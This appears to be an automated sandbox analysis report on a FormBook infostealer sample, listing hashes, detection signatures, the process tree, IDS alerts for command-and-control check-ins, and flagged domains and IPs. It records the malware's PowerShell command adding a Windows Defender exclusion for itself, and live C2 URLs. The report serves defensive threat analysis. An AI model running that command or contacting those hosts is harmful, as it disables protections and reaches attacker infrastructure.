Windows Analysis Report
SW_5724.exe

Overview

General Information

Sample name: SW_5724.exe
Analysis ID: 1567396
MD5: cf8c34b20f0e8654371c004272b4def6
SHA1: 1c81b7ac021345bd328e7cabee98979a1923d5b3
SHA256: 61890e63d7ba75eeccb7bf59ab004ab2aa94e463137a8fbb162d40921a8aa59f
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SW_5724.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\SW_5724.exe" MD5: CF8C34B20F0E8654371C004272B4DEF6)
    • powershell.exe (PID: 7464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7656 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • SW_5724.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\SW_5724.exe" MD5: CF8C34B20F0E8654371C004272B4DEF6)
    • SW_5724.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\SW_5724.exe" MD5: CF8C34B20F0E8654371C004272B4DEF6)
      • BmUrsTIvMw.exe (PID: 5068 cmdline: "C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 8024 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • BmUrsTIvMw.exe (PID: 1536 cmdline: "C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7084 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 6.2.SW_5724.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 6.2.SW_5724.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

                System Summary

                Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_5724.exe", ParentImage: C:\Users\user\Desktop\SW_5724.exe, ParentProcessId: 7284, ParentProcessName: SW_5724.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", ProcessId: 7464, ProcessName: powershell.exe
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_5724.exe", ParentImage: C:\Users\user\Desktop\SW_5724.exe, ParentProcessId: 7284, ParentProcessName: SW_5724.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", ProcessId: 7464, ProcessName: powershell.exe

                AV Detection

                Source: http://www.appsolucao.shop/8mlm/, Avira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/8mlm/?jnGlY=dHeXwH1PkJZDr&fh=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0VbuKcGIGxf8Na/XWMFk3HWS90xtCxfW9k4DFGjEgQ==, Avira URL Cloud: Label: malware
                Source: SW_5724.exe, ReversingLabs: Detection: 42%
                Source: Yara match, File source: 6.2.SW_5724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 6.2.SW_5724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: SW_5724.exe, Joe Sandbox ML: detected
                Source: SW_5724.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SW_5724.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BmUrsTIvMw.exe, 00000009.00000002.4514409614.000000000019E000.00000002.00000001.01000000.0000000C.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4514410674.000000000019E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: SW_5724.exe, 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2350461872.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2347907169.00000000029E2000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SW_5724.exe, SW_5724.exe, 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 0000000A.00000003.2350461872.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2347907169.00000000029E2000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000003.2595517086.0000000000F2B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000003.2595517086.0000000000F2B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 10_2_0047C7B0 FindFirstFileW,FindNextFileW,FindClose (10_2_0047C7B0)
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 4x nop then xor eax, eax (10_2_00469F10)
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 4x nop then pop edi (10_2_0046E37A)
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 4x nop then mov ebx, 00000004h (10_2_02BA0525)

                Networking

                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49796 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49796 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49849 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49849 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49855 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49833 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49855 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49883 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49877 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49839 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49890 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49890 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49905 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49913 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49871 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49919 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49927 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49927 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49943 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49949 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49955 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49961 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49961 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50007 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50011 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50011 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 172.67.156.195:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 172.67.156.195:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50027 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50015 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50015 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50027 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 172.67.156.195:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50019 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50019 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50023 -> 172.67.156.195:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50023 -> 172.67.156.195:80
                Source: DNS query: www.egldfi.xyz
                Source: DNS query: www.egyshare.xyz
                Source: DNS query: www.dating-apps-az-dn5.xyz
                Source: Joe Sandbox View, IP Address: 13.248.169.48
                Source: Joe Sandbox View, IP Address: 209.74.77.107
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View, ASN Name: AMAZON-02US
                Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:24:37 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 
37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: regini.exe, 0000000A.00000002.4516139537.0000000004D50000.00000004.10000000.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.0000000004630000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://bloodbalancecaps.shop/qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72
                Source: SW_5724.exe, 00000000.00000002.2082673604.00000000029D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: SW_5724.exe, 00000000.00000002.2082673604.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: BmUrsTIvMw.exe, 0000000B.00000002.4517476095.00000000050E4000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bloodbalancecaps.shop
                Source: BmUrsTIvMw.exe, 0000000B.00000002.4517476095.00000000050E4000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bloodbalancecaps.shop/qimy/
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 0000000A.00000002.4516139537.0000000004708000.00000004.10000000.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.0000000003FE8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:regular
                Source: regini.exe, 0000000A.00000002.4516139537.0000000004708000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000A.00000002.4518077946.0000000005BF0000.00000004.00000800.00020000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.0000000003FE8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 0000000A.00000002.4514767041.00000000028FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 0000000A.00000002.4514767041.000000000292B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
